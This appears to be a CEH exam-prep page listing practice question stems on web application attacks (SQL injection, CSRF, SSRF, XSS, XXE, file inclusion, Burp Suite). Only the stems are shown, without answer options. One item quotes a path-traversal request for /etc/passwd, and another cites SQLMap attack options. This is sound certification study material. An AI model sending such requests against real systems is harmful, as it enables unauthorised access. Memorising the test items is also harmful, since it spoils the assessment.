Question 154hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?

Question 155mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security team deployed a web application firewall (WAF) that blocks requests containing SQL keywords like 'SELECT', 'UNION', and 'DROP'. An attacker bypasses the WAF by encoding the payload in base64 and using a SQL injection tool that decodes it server-side. Which mitigation would be MOST effective against this?

Question 156easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?

Question 157mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?

Question 158hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web server running IIS 8.5 is found to have WebDAV enabled with write permissions. Which attack is MOST likely to be successful against this configuration?

Question 159easymultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker crafts a link that, when clicked by an authenticated user, performs an unintended action on a web application where the user is logged in, such as changing their email address. The application uses a session cookie for authentication but does not include any anti-forgery tokens in forms. Which attack is this?

Question 160mediummulti select
Read the full Web Application and Injection Attacks explanation →

A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?

Question 161mediummulti select
Read the full Web Application and Injection Attacks explanation →

During a penetration test, a tester finds a web application that reflects user input in the page without sanitization. Which TWO types of XSS are potentially exploitable in this scenario?

Question 162mediummulti select
Read the full Web Application and Injection Attacks explanation →

An attacker is attempting to perform an Insecure Direct Object Reference (IDOR) attack on a web application. Which TWO conditions are necessary for this attack to succeed?

Question 163hardmulti select
Read the full NAT/PAT explanation →

A pentester uses Burp Suite's Intruder to perform a brute-force attack on a login form. Which THREE of the following Intruder attack types would be appropriate for testing different payload combinations?

Question 164easymulti select
Read the full Web Application and Injection Attacks explanation →

A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?

Question 165hardmulti select
Read the full Web Application and Injection Attacks explanation →

A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?

Question 166mediummulti select
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)

Question 167mediummulti select
Read the full Web Application and Injection Attacks explanation →

During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)

Question 168hardmulti select
Read the full Web Application and Injection Attacks explanation →

A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)

Question 169mediummulti select
Read the full Web Application and Injection Attacks explanation →

A penetration tester uses Burp Suite to intercept and modify web traffic. Which TWO features in Burp Suite would be MOST useful for performing a brute-force attack on a login form? (Choose TWO.)

Question 170hardmulti select
Read the full Web Application and Injection Attacks explanation →

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)

Question 171easymulti select
Read the full Web Application and Injection Attacks explanation →

A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)

Question 172mediummulti select
Read the full Web Application and Injection Attacks explanation →

During a web application test, the tester finds that the application includes user-supplied file names in include() statements. Which TWO of the following are indicators of a Remote File Inclusion (RFI) vulnerability? (Choose TWO.)

Practice tests

Scored 10-question sessions with instant feedback and explanations.

CEH Practice Test 1 — 10 Questions→CEH Practice Test 2 — 10 Questions→CEH Practice Test 3 — 10 Questions→CEH Practice Test 4 — 10 Questions→CEH Practice Test 5 — 10 Questions→CEH Practice Exam 1 — 20 Questions→CEH Practice Exam 2 — 20 Questions→CEH Practice Exam 3 — 20 Questions→CEH Practice Exam 4 — 20 Questions→Free CEH Practice Test 1 — 30 Questions→Free CEH Practice Test 2 — 30 Questions→Free CEH Practice Test 3 — 30 Questions→CEH Practice Questions 1 — 50 Questions→CEH Practice Questions 2 — 50 Questions→CEH Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Footprinting, Reconnaissance and ScanningEnumeration and System HackingMalware, Social Engineering and Network AttacksWeb Application and Injection AttacksIntroduction to Ethical HackingScanning Networks and EnumerationVulnerability Analysis and System HackingAdvanced Topics: Wireless, Cloud, IoT, CryptographyFootprinting and ReconnaissanceNetwork and Web Application AttacksWireless, IoT and Cloud SecurityCryptography and Malware AnalysisSocial Engineering and Physical Security

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Web Application and Injection Attacks setsAll Web Application and Injection Attacks questionsCEH Practice Hub